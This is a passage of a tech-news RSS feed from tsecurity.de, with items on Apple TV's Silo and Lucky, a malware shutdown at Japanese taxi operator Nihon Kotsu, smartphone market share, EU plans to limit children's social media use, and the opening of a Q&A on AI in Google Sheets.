<guid isPermaLink="true">https://tsecurity.de/de/3670631/ios-mac-os/silo-season-3-episode-3-preview-juliettes-memory-loss-could-become-the-silos-biggest-threat/</guid>
<pubDate>Wed, 15 Jul 2026 14:25:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 3 will continue Juliette Nichols’ fight to recover her missing memories as hidden forces tighten their control over Silo 18. The episode could show why her damaged memory now threatens everyone living underground.




Episode title: “A Dark Web”



Release date: Friday, July 17, 2026



Streaming platform: Apple TV



Genre: Science fiction, mystery and dystopian drama



Season length: 10 episodes



Main cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Avi Nash, Alexandria Riley, Jessica Henwick and Ashley Zukerman



New episodes: Every Friday through September 4, 2026




Spoilers ahead for Silo Season 3 Episode 2.



Juliette entered the season unable to remember important parts of her life, including the rebellion, her allies and the events surrounding her return to Silo 18. Episode 2 revealed that her condition is connected to memory-erasing drugs rather than an ordinary injury. Camille and Nurse Amy have been secretly controlling her treatment while following instructions connected to the Algorithm.



Juliette is beginning to question her new reality



Juliette’s memories remain incomplete, but fragments have started returning. These flashes directly challenge the version of events Camille has presented to her.



Episode 3 will likely follow Juliette as she investigates the people managing her recovery. The title “A Dark Web” suggests that she will discover a wider network operating inside the silo, possibly involving medical staff, surveillance systems and officials who want the population to forget the rebellion.



Patrick Kennedy has already helped Juliette understand that forgetfulness drugs exist. His information gives her a starting point, but accepting the truth also places her in greater danger. Anyone controlling the memory program will know that Juliette becomes harder to manage each time she remembers something.



Why Juliette’s memory loss threatens Silo 18



Juliette carries information that can expose the silo’s leadership, the purpose of the cleaning process and the truth about the world outside. Her missing memories temporarily protect the people responsible for hiding those secrets.



However, her confusion can also cause serious damage. Juliette may distrust genuine allies, follow manipulated information or make decisions without understanding their consequences. Since the silo is still recovering from rebellion, one wrong move can restart the conflict between residents and those in power.



Her search for Lukas Kyle could become especially important. Finding him may help her rebuild the missing parts of her story, including what happened before her forced cleaning and why the authorities consider her so dangerous.



The Before Times investigation will become more dangerous



Episode 3 will also continue the storyline set more than three centuries earlier. Journalist Helen Drew and Congressman Daniel Keene are investigating a conspiracy connected to the events that eventually forced humanity underground. Apple describes their discovery as a chain of events with catastrophic and irreversible consequences.



Helen’s investigation into memory experiments could explain why similar methods are being used against Juliette centuries later. The two timelines appear to be moving toward the same answer: memory control helped create the silo system and continues to protect it.



Silo Season 3 Episode 3 arrives on Apple TV on July 17. What do you think Juliette will remember next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anya Taylor-Joy’s Lucky Is Now Streaming on Apple TV: Everything You Need to Know]]></title>
<description><![CDATA[Apple TV has premiered its new limited series Lucky, starring Anya Taylor-Joy as a skilled con artist trying to escape the criminal life that shaped her. The crime thriller made its global debut on Wednesday, July 15, 2026, with its first two episodes available together.



Taylor-Joy also serves...]]></description>
<link>https://tsecurity.de/de/3669616/ios-mac-os/anya-taylor-joys-lucky-is-now-streaming-on-apple-tv-everything-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669616/ios-mac-os/anya-taylor-joys-lucky-is-now-streaming-on-apple-tv-everything-you-need-to-know/</guid>
<pubDate>Wed, 15 Jul 2026 07:08:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has premiered its new limited series Lucky, starring Anya Taylor-Joy as a skilled con artist trying to escape the criminal life that shaped her. The crime thriller made its global debut on Wednesday, July 15, 2026, with its first two episodes available together.



Taylor-Joy also serves as an executive producer on the series, which is based on Marissa Stapley’s bestselling novel of the same name. The supporting cast includes Annette Bening, Timothy Olyphant, Aunjanue Ellis-Taylor, Drew Starkey, Clifton Collins Jr., William Fichtner, and Mo McRae.



The remaining episodes will arrive every Wednesday, giving Apple TV viewers a new chapter each week through the middle of August.




Number of episodes: Seven



Genre: Crime thriller and drama



Premiere date: July 15, 2026



Finale date: August 19, 2026



Release schedule: First two episodes on July 15, followed by one episode every Wednesday



Rating: TV-MA



Streaming platform: Apple TV




What is Lucky about?



Lucky follows a young woman who was raised inside a life of crime but managed to leave that world behind. Her attempt to build a safer future falls apart when circumstances force her to use her criminal skills one final time.



Anya Taylor-Joy plays Lucky Armstrong, a clever and experienced grifter who becomes trapped between dangerous criminals and investigators chasing her. Her final job goes badly, leaving her without the freedom and security she expected.



The story moves between Lucky’s troubled past and her increasingly dangerous present. As she runs out of people she can trust, she must rely on deception, quick decisions, and the survival skills taught to her by her family.



Where is the story heading?



Minor spoilers ahead.



The opening episodes place Lucky at the centre of a failed criminal plan involving stolen money, betrayal, and a growing law-enforcement investigation. Her husband, Cary, played by Drew Starkey, also becomes an important part of the mystery surrounding what happened after their plan collapsed.



Timothy Olyphant appears as Lucky’s estranged father, while Annette Bening plays Priscilla, a powerful and ruthless criminal figure. Aunjanue Ellis-Taylor joins the story as FBI agent Billie Rand, who follows Lucky’s trail while trying to understand the larger operation around her.



As the series continues, Lucky will have to confront the people who shaped her criminal past while deciding how far she is prepared to go for a fresh start. The weekly release schedule should gradually reveal who betrayed her, where the missing money went, and whether Lucky can escape without becoming the person she wanted to leave behind.



FAQs



When did Lucky premiere on Apple TV?



Lucky premiered globally on Apple TV on Wednesday, July 15, 2026. The streaming service released the first two episodes together.



How many episodes are in Lucky?



The limited series has seven episodes. Following the two-episode premiere, five additional episodes will arrive weekly through August 19, 2026.



When will the Lucky finale be released?



The final episode of Lucky is scheduled to stream on Wednesday, August 19, 2026.



Is Lucky based on a book?



Yes. The series is based on Marissa Stapley’s bestselling 2021 novel Lucky, which follows a con artist forced to confront her past after a major scheme goes wrong.



Who stars alongside Anya Taylor-Joy?



The cast includes Annette Bening, Timothy Olyphant, Aunjanue Ellis-Taylor, Drew Starkey, Clifton Collins Jr., William Fichtner, and Mo McRae.



Is Lucky a limited series?



Yes. Apple TV describes Lucky as a limited drama series, so its seven episodes are designed to tell one complete story.



How much does Apple TV cost in the US?



Apple TV costs $12.99 per month in the United States after a seven-day free trial for eligible new subscribers.



The first two episodes of Lucky are now streaming on Apple TV, with new episodes arriving every Wednesday until August 19. Are you planning to watch Anya Taylor-Joy’s latest crime thriller? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google and Epic give up fighting — third-party Android app stores are coming next week]]></title>
<description><![CDATA[Epic Games and Google have just jointly withdrawn their attempt to retroactively settle the lawsuit that's changing how Android app stores work in the United States - and that means Google will be forced to carry rival app stores inside of its own. In fact, Google tells the court, it's ready to b...]]></description>
<link>https://tsecurity.de/de/3669515/it-nachrichten/google-and-epic-give-up-fighting-third-party-android-app-stores-are-coming-next-week/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669515/it-nachrichten/google-and-epic-give-up-fighting-third-party-android-app-stores-are-coming-next-week/</guid>
<pubDate>Wed, 15 Jul 2026 05:47:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Epic Games and Google have just jointly withdrawn their attempt to retroactively settle the lawsuit that's changing how Android app stores work in the United States - and that means Google will be forced to carry rival app stores inside of its own. In fact, Google tells the court, it's ready to begin carrying third-party […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Malware Hits Japan’s Top Taxi Firm Nihon Kotsu]]></title>
<description><![CDATA[Japan’s premier taxi operator, Nihon Kotsu, recently experienced a severe cybersecurity breach that forced a sweeping shutdown of its internal networks. This article has been indexed from CyberMaterial Read the original article: Malware Hits Japan’s Top Taxi Firm Nihon Kotsu
Read more →
The post ...]]></description>
<link>https://tsecurity.de/de/3668063/it-security-nachrichten/malware-hits-japans-top-taxi-firm-nihon-kotsu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668063/it-security-nachrichten/malware-hits-japans-top-taxi-firm-nihon-kotsu/</guid>
<pubDate>Tue, 14 Jul 2026 15:24:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Japan’s premier taxi operator, Nihon Kotsu, recently experienced a severe cybersecurity breach that forced a sweeping shutdown of its internal networks. This article has been indexed from CyberMaterial Read the original article: Malware Hits Japan’s Top Taxi Firm Nihon Kotsu</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malware-hits-japans-top-taxi-firm-nihon-kotsu/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malware-hits-japans-top-taxi-firm-nihon-kotsu/">Malware Hits Japan’s Top Taxi Firm Nihon Kotsu</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3’s Two Timelines Explained: How the Past Changes Everything]]></title>
<description><![CDATA[Silo Season 3 follows two timelines separated by more than three centuries, with Juliette Nichols fighting for the truth inside Silo 18 while new characters reveal how the underground world began.




Release date: July 3, 2026



Streaming platform: Apple TV



Episodes: 10



Release schedule: ...]]></description>
<link>https://tsecurity.de/de/3667780/ios-mac-os/silo-season-3s-two-timelines-explained-how-the-past-changes-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667780/ios-mac-os/silo-season-3s-two-timelines-explained-how-the-past-changes-everything/</guid>
<pubDate>Tue, 14 Jul 2026 13:39:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 follows two timelines separated by more than three centuries, with Juliette Nichols fighting for the truth inside Silo 18 while new characters reveal how the underground world began.




Release date: July 3, 2026



Streaming platform: Apple TV



Episodes: 10



Release schedule: New episode every Friday



Season finale: September 4, 2026



Genre: Science fiction, dystopian drama and political thriller



Based on: Hugh Howey’s Silo novel trilogy



Main cast: Rebecca Ferguson, Common, Tim Robbins, Chinaza Uche and Alexandria Riley



New cast: Ashley Zukerman, Jessica Henwick, Jessica Brown Findlay, Morven Christie, Laura Innes, Reed Birney, Matt Craven and Colin Hanks




Apple has confirmed that Season 3 continues the present-day crisis inside Silo 18 while introducing an origin story set centuries earlier. The two stories initially appear separate, but both explore memory loss, political control and the decisions that eventually forced humanity underground.



Spoilers Ahead for Silo Season 3



The present-day timeline begins after Juliette returns to Silo 18 and prevents its residents from walking outside. Her survival should make her the most trusted person in the silo, but she wakes with major gaps in her memory.



Juliette can no longer clearly remember Bernard, the rebellion or the events that brought her home. Robert Sims and Camille use her condition to influence what she believes, while medication appears to weaken her remaining memories. Even so, brief images from her past suggest that the truth has not disappeared completely.



The Present Timeline Follows Juliette in Silo 18



The first timeline takes place roughly 352 years after the event that destroyed the outside world. Juliette now holds an important position inside Silo 18, but her memory loss leaves her vulnerable to the people controlling information.



Her storyline also reveals a larger plan involving memory manipulation. The Algorithm appears prepared to erase memories across multiple silos through drugs placed in their water supply.



This explains why earlier generations forgot rebellions, historical records and details about the outside world. Juliette’s resistance to the treatment could help her uncover how the silos have controlled their populations for centuries.



The Before Times Reveal How the Crisis Started



The second timeline takes viewers back to Washington, D.C., before the silos became humanity’s permanent home.



Congressman Daniel Keene becomes involved in a political conspiracy connected to an alleged Iranian attack on American soil. His sister Charlotte, a fighter pilot, returns from a secret mission involving a strange substance and begins experiencing memory problems.



Their story turns the series into a political thriller as government officials, military operations and secret experiments move closer to the event that ended normal life on the surface. Showrunner Graham Yost said this section draws inspiration from paranoid thrillers of the 1970s.



How the Two Silo Season 3 Timelines Connect



Memory loss provides the clearest connection between the timelines.



Charlotte experiences missing memories in the Before Times, while Juliette faces similar problems centuries later. This suggests that the technology used to control people inside the silos existed before the underground communities were created.



Daniel and Charlotte’s investigation should eventually explain who designed the silos, why people entered them and how the Algorithm gained control. Meanwhile, Juliette’s story shows the long-term consequences of those decisions.



The timelines are moving toward the same central answer: someone planned the silo system before the world ended, and memory manipulation helped keep that system alive for more than 300 years.



Silo Season 3 releases new episodes every Friday on Apple TV through September 4. What do you think connects Juliette, Charlotte and the creation of the silos? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nihon Kotsu Cyberattack Disrupts Japan’s Largest Taxi Operator]]></title>
<description><![CDATA[The Nihon Kotsu cyberattack has disrupted operations at Japan's largest taxi operator after the company confirmed that its internal systems were compromised by a malware-related security incident. The cyberattack on Nihon Kotsu forced the company to shut down parts of its IT infrastructure, leavi...]]></description>
<link>https://tsecurity.de/de/3667224/it-security-nachrichten/nihon-kotsu-cyberattack-disrupts-japans-largest-taxi-operator/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667224/it-security-nachrichten/nihon-kotsu-cyberattack-disrupts-japans-largest-taxi-operator/</guid>
<pubDate>Tue, 14 Jul 2026 09:52:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1408" height="768" src="https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Nihon Kotsu cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack.webp 1408w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-1024x559.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-1140x622.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack.webp 1408w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-1024x559.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/Nihon-Kotsu-cyberattack-1140x622.webp 1140w" sizes="(max-width: 1408px) 100vw, 1408px" title="Nihon Kotsu Cyberattack Disrupts Japan's Largest Taxi Operator 1"></p><span data-contrast="auto">The Nihon Kotsu cyberattack has disrupted operations at Japan's largest taxi operator after the company confirmed that its internal systems were compromised by a malware-related security incident. The cyberattack on Nihon Kotsu forced the company to shut down parts of its IT infrastructure, leaving key Japan taxi service operations, including its taxi dispatch system, unavailable.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">According to the company, the incident occurred early on Saturday, July 11, 2026. After detecting unauthorized access, Nihon Kotsu immediately shut down affected systems to contain the attack and prevent additional damage. The taxi dispatch service operated via telephone, the hire car web ordering and reservation management system, and several internal systems remain temporarily offline.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Nihon Kotsu Shuts Down Systems</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Nihon Kotsu, Japan's largest taxi and chauffeur operator by group revenue, generates approximately ¥155 billion (around $1 billion) annually. The company employs 18,228 people and operates a fleet of 8,558 taxis alongside more than 2,000 chauffeur vehicles, making the disruption significant for the country's</span><span data-contrast="auto"> Japan taxi service sector.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">In a <a href="https://www.nihon-kotsu-taxi.jp/news/260713/" target="_blank" rel="nofollow noopener">statement</a>, the company said, "We have confirmed that our internal systems were subjected to unauthorized external access (malware infection)." It also apologized for the incident, stating, "We sincerely apologize for the great inconvenience and concern this has caused to our customers, business partners, and all other parties involved."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Japan Taxi Service Affected as Dispatch Operations Remain Offline</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The company explained that emergency measures were implemented immediately after the breach was detected. "Upon detecting the unauthorized access, we immediately took emergency measures, including shutting down systems, to prevent further damage," the statement said. It added that the disruption has affected web-based hire car reservations, telephone taxi dispatch services, and certain internal systems.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">As the <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28960">cyberattack</a> on Nihon Kotsu continues to be investigated, customers requiring taxis have been advised to use the GO taxi application, nearby taxi stands, or hail a cab directly from the street. Users of the GO app can still request a Nihon Kotsu vehicle by selecting the company within the application.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The company said it is working with external <a href="https://thecyberexpress.com/13-specialists-in-cisa-cybersecurity-committee/" target="_blank" rel="noopener">cybersecurity specialists</a> to determine the cause of the incident, analyze system logs, and assess the overall impact. According to the statement, the internal network has been isolated, and "further spread of the damage has been contained."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Investigation into the Nihon Kotsu Cyberattack Continues</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Investigators are also examining whether any personal or corporate <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28962">data</a> was exposed during the Nihon Kotsu cyberattack. The company stated that no information leak has been confirmed at this stage. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">However, it noted that a detailed <a href="https://thecyberexpress.com/advantest-cyberattack-ransomware-investigation/" target="_blank" rel="noopener">investigation</a> is ongoing with specialized agencies to determine whether any data was compromised. If customer or partner information is found to have been exposed, Nihon Kotsu said it will make a public <a class="wpil_keyword_link" href="https://cyble.com/announcement/" target="_blank" rel="noopener" title="announcement" data-wpil-keyword-link="linked" data-wpil-monitor-id="28961">announcement</a> and individually notify affected parties in accordance with applicable laws.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The company said restoring systems securely remains its highest priority. It also pledged to provide updates on both the investigation and recovery process as more information becomes available. In the meantime, Nihon Kotsu urged customers to remain cautious of <a href="https://thecyberexpress.com/fraudulent-emails-scam/" target="_blank" rel="noopener">fraudulent emails</a> or messages claiming to originate from the company and advised them not to open suspicious attachments or click unknown links.</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":240,"335559739":240,"335559740":279}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Global Phone Market Shrinks But Apple And Samsung Grab More Share]]></title>
<description><![CDATA[Fewer people are buying new phones right now, but the two biggest names in the industry are actually selling more devices. Global smartphone shipments dropped by 4% in the second quarter of 2026 compared to last year, according to Omdia. A severe memory chip shortage is pushing up the cost to bui...]]></description>
<link>https://tsecurity.de/de/3666759/ios-mac-os/global-phone-market-shrinks-but-apple-and-samsung-grab-more-share/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666759/ios-mac-os/global-phone-market-shrinks-but-apple-and-samsung-grab-more-share/</guid>
<pubDate>Tue, 14 Jul 2026 05:08:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fewer people are buying new phones right now, but the two biggest names in the industry are actually selling more devices. Global smartphone shipments dropped by 4% in the second quarter of 2026 compared to last year, according to Omdia. A severe memory chip shortage is pushing up the cost to build these devices, especially the cheaper ones. While this crisis hurts overall numbers, the top two brands found a way to win.



Apple and Samsung capture more buyers despite rising component costs



Even with fewer total phones shipping worldwide, Samsung held onto the number one spot and increased its market share from 20% to 22%. The brand saw strong demand because it pushed the launch of its premium Galaxy devices into the second quarter. It also picked up new customers looking for budget options as rival companies pulled back their cheaper product lines.



At the same time, Apple reported its best second quarter in history. Its market share jumped from 16% to 20% during a time of year that is usually slow for the company. The latest iPhone models triggered a massive wave of upgrades. The brand also managed to keep its prices steady while competing manufacturers were forced to charge more.



Budget phone buyers face fewer choices as hardware prices climb



The highest price hikes are hitting phones that cost under $400. Memory and storage parts now make up over 60% of the total cost to build a budget device. Because these parts are so expensive right now, companies are making less profit on cheaper phones and shifting their focus to premium models. Other brands like Xiaomi, Oppo, and Vivo all lost market share during this quarter.



Looking ahead, experts expect the market to stay rough for the rest of 2026. Normal holiday shopping peaks will clash with the ongoing chip shortage. Phone makers will likely keep pushing expensive models to protect their profits. If you are shopping on a tight budget, you might need to delay your purchase, use a payment plan, or look into refurbished devices until prices finally drop.



The smartphone landscape is clearly splitting into two. The giants are securing their hold on the premium space, leaving budget-conscious shoppers with fewer attractive options for the foreseeable future.]]></content:encoded>
</item>
<item>
<title><![CDATA[T-Mobile Customers on Old Plans Are Being Pushed to New Ones Starting This Week]]></title>
<description><![CDATA[If you're on a grandfathered plan, it will soon be automatically forced onto a newer plan that could cost more.]]></description>
<link>https://tsecurity.de/de/3666551/it-nachrichten/t-mobile-customers-on-old-plans-are-being-pushed-to-new-ones-starting-this-week/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666551/it-nachrichten/t-mobile-customers-on-old-plans-are-being-pushed-to-new-ones-starting-this-week/</guid>
<pubDate>Tue, 14 Jul 2026 00:47:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you're on a grandfathered plan, it will soon be automatically forced onto a newer plan that could cost more.]]></content:encoded>
</item>
<item>
<title><![CDATA[Excel competition goes extreme, makes spreadsheet geeks compete from the street]]></title>
<description><![CDATA[Defending world champ Diarmuid Early wins again despite being forced to solve puzzles outdoors]]></description>
<link>https://tsecurity.de/de/3666393/it-nachrichten/excel-competition-goes-extreme-makes-spreadsheet-geeks-compete-from-the-street/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666393/it-nachrichten/excel-competition-goes-extreme-makes-spreadsheet-geeks-compete-from-the-street/</guid>
<pubDate>Mon, 13 Jul 2026 22:32:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Defending world champ Diarmuid Early wins again despite being forced to solve puzzles outdoors]]></content:encoded>
</item>
<item>
<title><![CDATA[Social Media Limits Are Coming For Teens Across Europe]]></title>
<description><![CDATA[The European Union is considering major new restrictions on children's access to social media, including age limits, phased access, and an outright ban. "This is not about whether children can access social media," said European Commission President Ursula von der Leyen. "It is about when social ...]]></description>
<link>https://tsecurity.de/de/3665989/it-security-nachrichten/social-media-limits-are-coming-for-teens-across-europe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665989/it-security-nachrichten/social-media-limits-are-coming-for-teens-across-europe/</guid>
<pubDate>Mon, 13 Jul 2026 19:09:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The European Union is considering major new restrictions on children's access to social media, including age limits, phased access, and an outright ban. "This is not about whether children can access social media," said European Commission President Ursula von der Leyen. "It is about when social media can access our children." The Verge reports: Social media platforms could also be forced to prove their services are not harmful before young people are allowed to use them. European Commission President Ursula von der Leyen said the bloc's executive arm could propose new legislation within months, after reviewing recommendations from a panel of experts released today.
 
The panel recommended using a phased approach, including "no screens at all" for children under 3, supervised internet use for those under 13, and some limits for older teens. It also said social media platforms should have to prove their services are safe to younger users, an approach von der Leyen said she supports. Von der Leyen said the Commission will consider the report and return with proposals "after the summer." Any legislation would still need approval from the European Parliament and the EU's 27 member countries before becoming law across the bloc.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Social+Media+Limits+Are+Coming+For+Teens+Across+Europe%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F13%2F1638208%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F13%2F1638208%2Fsocial-media-limits-are-coming-for-teens-across-europe%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/13/1638208/social-media-limits-are-coming-for-teens-across-europe?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EU Proposes Banning Social Media For Kids Under 13 With Phased Access]]></title>
<description><![CDATA[The European Union is preparing to introduce strict new rules to limit how young children interact with online platforms. Based on expert recommendations, the bloc plans to ban kids under 13 from using social media altogether. The proposed changes also outline a system for phased and gradual acce...]]></description>
<link>https://tsecurity.de/de/3665294/ios-mac-os/eu-proposes-banning-social-media-for-kids-under-13-with-phased-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665294/ios-mac-os/eu-proposes-banning-social-media-for-kids-under-13-with-phased-access/</guid>
<pubDate>Mon, 13 Jul 2026 14:54:04 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The European Union is preparing to introduce strict new rules to limit how young children interact with online platforms. Based on expert recommendations, the bloc plans to ban kids under 13 from using social media altogether. The proposed changes also outline a system for phased and gradual access for teenagers, marking a major shift in how governments handle digital safety and online well-being.



Platforms must prove their safety before teenagers gain gradual access



European Commission President Ursula von der Leyen recently shared that the focus should be on when social media can access children, rather than the other way around. Following advice from a special panel of doctors and youth experts, the plan calls for a strict cutoff date for when children can first create accounts. Kids under 13 would only be allowed to use these services for limited times under direct supervision from a parent or teacher.



Once a child turns 13, the restrictions will slowly begin to lift. However, this gradual access depends entirely on the platforms themselves. Tech companies will have to prove that their services are safe and age-appropriate before teenagers can use them freely. A formal legal proposal to enforce these rules across all member states is expected in the second half of the year.



The new digital rules target addictive designs from large companies



This new initiative builds on previous actions taken by European lawmakers to protect younger users. The region has already started targeting the addictive nature of modern apps. For example, lawmakers have warned large tech platforms about specific design choices that keep users hooked for hours.



Features like the infinite scrolling feeds found on Facebook and other sites might soon face heavy restrictions if they are proven harmful to mental health. The European Union has repeatedly pressured Meta and similar businesses to rethink how their apps operate. If these companies cannot show effective safety measures, popular apps like Instagram could be forced to change how they deliver content to younger audiences or face massive fines.]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: How Google plans to reinvent the spreadsheet with AI]]></title>
<description><![CDATA[Nearly five decades after the launch of VisiCalc, AI is reshaping one of the world’s most familiar productivity tools — the humble spreadsheet.



While a lot of knowledge workers interact with spreadsheets on a regular basis, many lack the skills and confidence to access more advanced functions....]]></description>
<link>https://tsecurity.de/de/3665017/ai-nachrichten/qa-how-google-plans-to-reinvent-the-spreadsheet-with-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665017/ai-nachrichten/qa-how-google-plans-to-reinvent-the-spreadsheet-with-ai/</guid>
<pubDate>Mon, 13 Jul 2026 13:04:15 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nearly five decades after the launch of VisiCalc, AI is reshaping one of the world’s most familiar productivity tools — the humble spreadsheet.</p>



<p>While a lot of knowledge workers <a href="https://www.acuitytraining.co.uk/news-tips/new-excel-facts-statistics/" target="_blank" rel="noreferrer noopener">interact with spreadsheets on a regular basis</a>, many lack the skills and confidence to access more advanced functions.</p>



<p>“For a very long time, spreadsheets forced you to learn spreadsheet syntax and spreadsheet ways of working,” said Eric Birnbaum, director of product management for <a href="https://www.computerworld.com/article/1657150/how-to-use-google-sheets.html" data-type="link" data-id="https://www.computerworld.com/article/1657150/how-to-use-google-sheets.html">Google Sheets</a>. “But think about how many people need to use spreadsheets at work and don’t have the skill set to create the kinds of spreadsheets that can be really helpful for them.”</p>



